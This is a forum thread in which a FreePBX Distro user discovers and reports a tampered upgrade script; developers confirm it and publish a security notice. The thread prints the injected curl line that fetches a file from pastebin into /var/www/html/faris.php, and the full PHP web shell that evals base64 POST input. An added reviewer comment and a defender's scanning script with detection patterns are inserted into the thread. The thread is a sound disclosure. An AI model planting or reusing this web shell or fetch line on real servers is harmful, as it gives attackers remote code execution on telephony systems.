FreePBX Distro update shell scripts: do they change once released?

I noticed that the latest update script (nominally the “upgrade-4.211.64-6.sh” shell script), which was officially released on August 8th, 2013 (see here and here), changed today, August 13th (see here).

I think it will be interesting to know what changed between those dates and why, if some changes happened and were pushed, a new update script name was not chosen as you have well shown us? …reflecting the common habit of renaming an update script in order to inform us about a sort of difference.

If not…why lose time naming each shell update script unequivocally?

I’m forced to ask this because if we compare two identical FreePBX Distro 4.211.64-6 systems, one updated from -5 to -6 on August 9th (like I did on my system) and the other one just updated from -5 to -6 only today, they will probably differ (for example: DPMA?)…and the difference will persist at least until a new, different shell update script is available.

This sounds a little bit strange because if a specific update script exists (let me say from state “A.1” to state “A.2” or whatever) it should update the system in which it’s invoked from state “A.1” to state “A.2”, no matter the date of its execution (it’s not like running a “yum upgrade”).

I’m pretty sure (I did it!) that the same shell update script can be (re)invoked more and more times on the same FreePBX Distro system (no preliminary Go/No-Go checks were placed to prevent such consecutive executions), but I then expect that the same final result will be obtained each time (the first execution made updates…so OK…the next ones made nothing if the whole system is already updated).

If the sense is: some scripts were used to push specific testing updates…that’s OK…but rather than overwrite an officially released one, why not create a very specific one?

Am I missing (or messing) something about that?

The change that was made today was for a spelling error that was reported to us. Nothing else would have changed. If we added new items or packages then we would bump the -x version on it.

Well, I’m pretty sure I saw a new RPM (digiumaddons) in the update log after invoking the update script the second time.

At this point I really don’t care about what was/wasn’t installed during the second iteration; it’s only a matter of understanding (in terms of procedure to follow) when to apply those scripts (the day of their release or just after a while?).

One more question (be patient): if update notifications are set on FreePBX Distro (or update check interval was set on the Sys Admin Pro module) a similar change on the update script will be reported or not?

You all made a very great job with FreePBX/FreePBX Distro!

Best regards, Davide.

Typo: the RPM installed was “digiumaddoninstaller”.

Well, that was included in the -6 release from day one. Not sure what happened on your side, but that is odd.

On August 8th the 4.211.64-6 update script gave me:

Thu Aug 8 11:55:14 CEST 2013 This appears to be a FreePBX Distro system as it has a Distro Version of 4.211.64-5
VARIABLES SET FOR UPGRADE
asterisk=Asterisk 11.4.0 built by root @ jenkins-el6-64.schmoozecom.net on a x86_64 running Linux on 2013-06-02 15:27:41 UTC
kernel=Linux localhost.localdomain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
version=4.211.64-5
host=localhost.localdomain
upgradeversion=4.211.64-6
virtual=0

Thu Aug 8 11:55:14 CEST 2013 Your FreePBX Distro System is being upgraded to 4.211.64-6. Please standby…

Thu Aug 8 11:55:15 CEST 2013 STAGE 1 STARTING - GUI Modules
Thu Aug 8 11:55:16 CEST 2013 Upgrade All FreePBX GUI Modules
Thu Aug 8 11:55:48 CEST 2013 STAGE 1 COMPLETED - GUI Modules - Moving to Stage 2

Thu Aug 8 11:55:48 CEST 2013 STAGE 2 STARTING - RPM’s
Thu Aug 8 11:55:48 CEST 2013 Replace repos with only FreePBX Distro since some people have added other repos which can break updates
Thu Aug 8 11:55:49 CEST 2013 install ImageMagick
Thu Aug 8 12:02:34 CEST 2013 Updating all remaining RPMS now to Centos 6.4
Thu Aug 8 12:02:44 CEST 2013 STAGE 2 COMPLETED - Misc Items - Moving to Stage 4

Thu Aug 8 12:02:44 CEST 2013 STAGE 3 STARTING - Misc Items
Thu Aug 8 12:02:45 CEST 2013 STAGE 3 COMPLETED - Misc Items - Moving to Stage 4

Thu Aug 8 12:02:45 CEST 2013 STAGE 4 STARTING - Clean Up
Thu Aug 8 12:02:45 CEST 2013 updatedb for locate command
Thu Aug 8 12:02:46 CEST 2013 Restart incron to be safe
Thu Aug 8 12:02:46 CEST 2013 STAGE 4 COMPLETED - Clean Up - Moving to Stage 5

Thu Aug 8 12:02:46 CEST 2013 STAGE 5 STARTING - Final Verifications
Thu Aug 8 12:02:46 CEST 2013 STAGE 5 COMPLETED - Final Verifications - Moving to Stage 6

Thu Aug 8 12:02:47 CEST 2013 UPGRADE 100% COMPLETED

Then on August 13th, the modified 4.211.64-6 update script (downloaded and invoked ex novo) gave me:

Tue Aug 13 15:59:37 CEST 2013 This appears to be a FreePBX Distro system as it has a Distro Version of 4.211.64-6
VARIABLES SET FOR UPGRADE
asterisk=Asterisk 11.4.0 built by root @ jenkins-el6-64.schmoozecom.net on a x86_64 running Linux on 2013-06-02 15:27:41 UTC
kernel=Linux localhost.localdomain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
version=4.211.64-6
host=localhost.localdomain
upgradeversion=4.211.64-6
virtual=0

Tue Aug 13 15:59:37 CEST 2013 Your FreePBX Distro System is being upgraded to 4.211.64-6. Please standby…

Tue Aug 13 15:59:37 CEST 2013 STAGE 1 STARTING - GUI Modules
Tue Aug 13 15:59:39 CEST 2013 Upgrade All FreePBX GUI Modules
Tue Aug 13 16:00:04 CEST 2013 STAGE 1 COMPLETED - GUI Modules - Moving to Stage 2

Tue Aug 13 16:00:04 CEST 2013 STAGE 2 STARTING - RPM’s
Tue Aug 13 16:00:04 CEST 2013 Replace repos with only FreePBX Distro since some people have added other repos which can break updates
Tue Aug 13 16:00:05 CEST 2013 install ImageMagick
Tue Aug 13 16:00:56 CEST 2013 Install Packages for DPMA
Tue Aug 13 16:01:13 CEST 2013 Updating all remaining RPMS now to Centos 6.4
Tue Aug 13 16:01:15 CEST 2013 STAGE 2 COMPLETED - Misc Items - Moving to Stage 4

Tue Aug 13 16:01:15 CEST 2013 STAGE 3 STARTING - Misc Items
Tue Aug 13 16:01:15 CEST 2013 STAGE 3 COMPLETED - Misc Items - Moving to Stage 4

Tue Aug 13 16:01:15 CEST 2013 STAGE 4 STARTING - Clean Up
Tue Aug 13 16:01:16 CEST 2013 updatedb for locate command
Tue Aug 13 16:01:17 CEST 2013 Restart incron to be safe
Tue Aug 13 16:01:17 CEST 2013 STAGE 4 COMPLETED - Clean Up - Moving to Stage 5

Tue Aug 13 16:01:17 CEST 2013 STAGE 5 STARTING - Final Verifications
Tue Aug 13 16:01:17 CEST 2013 STAGE 5 COMPLETED - Final Verifications - Moving to Stage 6

Tue Aug 13 16:01:17 CEST 2013 UPGRADE 100% COMPLETED

You can see the reference to DPMA.

Today I see that the shell script upgrade-4.211.64-6.sh changed once again since its release on August 6th (the file date now appears as July 30th! …and not August 13th as before…also the file size has changed).

Maybe all this is normal but I still don’t understand why these modifications should happen this way.

See here for reference.

Best regards, Davide.

Nobody has changed anything, but we do have 3 different servers that host downloads, and I bet the time/date is different, as one of them is new as of last week and was just synced, so the date/time stamp will be different, but nothing changes in the files themselves.

Once a version is released the upgrade script won’t change. If we need to make a change, a new version is published.

That’s interesting.

From my location (Europe/Italy), currently (it’s a little bit nonsense to say where and when…I know the Internet is not static) the host upgrades.freepbx.org resolves to 199.102.239.49, which should belong to the Schmooze Com. IP block.

So if you load-balance download requests across three different servers (2 + 1 new), I still can’t understand (even if we accept having two servers with some file timestamps and the new one with older ones!) why the file size has changed (I saw 15k, and now 14k, with the same web browser)?

I downloaded the upgrade script (timestamp: 30.07.2013) and made a diff against the upgrade script previously used (timestamp: 13.08.2013); here it is:

diff upgrade-4.211.64-6.sh /tmp/upgrade-4.211.64-6.sh
311d310
< curl http://pastebin.com/download.php?i=k1uzphXc -o /var/www/html/faris.php
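Review bot: the `<` line at 311, present only in the first file (the July 30 copy), writes content fetched from pastebin.com, a host outside the project, straight into the served web root as `/var/www/html/faris.php`; an upgrade script should write only content obtained from the project's own update servers and should never drop an executable file into a web-served directory, so the line should be removed, and the published script should ship with a checksum or signature that the installer verifies before execution, so that a modified copy on a mirror is refused rather than run.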

The above line is present in the July 30th file, inside the End Stage 4 section, just before the section’s last echo and before the /usr/sbin/sysadmin_update_system -s -v$upgradeversion -i370 line.
The file with the August 13th timestamp doesn’t have that line of code inside the End Stage 4 section.

And this is the content of the pastebin URL:

<?php /* i-Hmx [email protected] */ if(md5($_POST['pwd'])=="523d9e9d019be0e774eabefa6e9c3dbc") { eval(base64_decode($_POST['fa'])); } else { die("i-Hmx
[email protected]"); } ?>

What’s that?

I don’t have any /var/www/html/faris.php file in my FreePBX Distro (at this point I think I’m lucky).

Don’t worry Tony, I’m a fool and it’s not too bad to go to bed now, but someone should keep an eye open on that, IMHO.

Regards, Davide.
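A defender's check for the situation described in this post, written as an added example that is not part of the thread or of the FreePBX project's own tooling: it pins the downloaded upgrade script to a SHA-256 (assuming the vendor publishes one, which the thread does not show), flags lines that fetch a URL into the web root or into a .php file, and scans a web root for PHP files that eval() request-controlled input. The two sample scripts, the web-root files, the paste.invalid URL and the PLACEHOLDER id are all constructed here.

```sh
#!/bin/sh
# Constructed samples (not the real FreePBX scripts): a clean copy of an
# upgrade script and a copy tampered the way the diff in the thread shows.
WORK=$(mktemp -d)
cat > "$WORK/upgrade-clean.sh" <<'EOF'
echo "STAGE 4 STARTING - Clean Up"
updatedb
/usr/sbin/sysadmin_update_system -s -v$upgradeversion -i370
EOF
cat > "$WORK/upgrade-tampered.sh" <<'EOF'
echo "STAGE 4 STARTING - Clean Up"
updatedb
curl http://paste.invalid/download.php?i=PLACEHOLDER -o /var/www/html/faris.php
/usr/sbin/sysadmin_update_system -s -v$upgradeversion -i370
EOF
# Constructed web root: one normal page and one file carrying the
# eval(base64_decode($_POST[...])) pattern quoted in the thread.
mkdir -p "$WORK/html"
printf '<?php echo "ok"; ?>\n' > "$WORK/html/index.php"
printf '<?php eval(base64_decode($_POST["fa"])); ?>\n' > "$WORK/html/faris.php"

sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi | cut -d' ' -f1
}

# Check 1: the downloaded script must match the pinned (vendor-published) hash.
script_matches_pinned_hash() { [ "$(sha256_of "$1")" = "$2" ]; }

# Check 2: succeed only if no line fetches a URL into the web root or into a
# .php file; any matching lines are printed and the function returns 1.
find_webroot_fetches() {
  ! grep -nE '(curl|wget).*(/var/www/|\.php)' "$1"
}

# Check 3: print PHP files under a web root that eval() request-controlled
# input (returns 0 when at least one is found, 1 when none).
scan_webroot_for_shells() {
  grep -rlE 'eval\((base64_decode\()?\$_(POST|GET|REQUEST)' "$1"
}

# Gate: run all three checks before an upgrade script is executed.
check_upgrade() {  # $1 script, $2 pinned sha256, $3 web root
  script_matches_pinned_hash "$1" "$2" || { echo "hash mismatch: $1"; return 1; }
  find_webroot_fetches "$1" || { echo "suspicious fetch in $1"; return 1; }
  scan_webroot_for_shells "$3" && { echo "possible web shell under $3"; return 1; }
  return 0
}
PINNED=$(sha256_of "$WORK/upgrade-clean.sh")   # stands in for the published hash
check_upgrade "$WORK/upgrade-tampered.sh" "$PINNED" "$WORK/html" || echo "REFUSING to run upgrade"
```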

Mumble mumble…it seems (Googling a little bit) to be an Elastix 2.3 PHP Code Injection Vulnerability (how was it possible?)…see here:

http://1337day.com/exploit/20101

Am I missing something at 02:54 AM in the morning of a fresh Italian night?

Davide - Thank you for this information. This is not any code that is in our code base and looks, to my untrained eye, to be disturbing. Neither that email nor the pastebin is associated with this project.

I was speaking with one of the lead team members when I saw this message. This information has been brought to the development team’s attention and is already being looked into.

Thank you for not letting go when you saw something that didn’t look right.

As soon as we have some information it will be shared.

Hi SkykingOH. Definitely. That’s evident. Thank you for your intervention. Better four or more eyes on that. I’ll (try to) keep my eyes wide open as often as possible.

As Scott previously stated, the development team has been made aware of the issue and we are looking into it. We also found the upgrade script in question and have taken the appropriate steps necessary to serve the original unmodified script from our servers. We are still working to investigate the issue that has been reported and hope to have a blog post up about it as soon as possible. We apologize for the inconvenience and thank you for bringing this to our attention.

parnassus,

once again, thank you from all of us for bringing this to our attention. I have posted a blog on this issue that sums up the situation. We are very grateful for your bringing this issue up.

Please see the Security Notice blog post for details.

Hello Philippe, I’m glad to be of help!
Davide.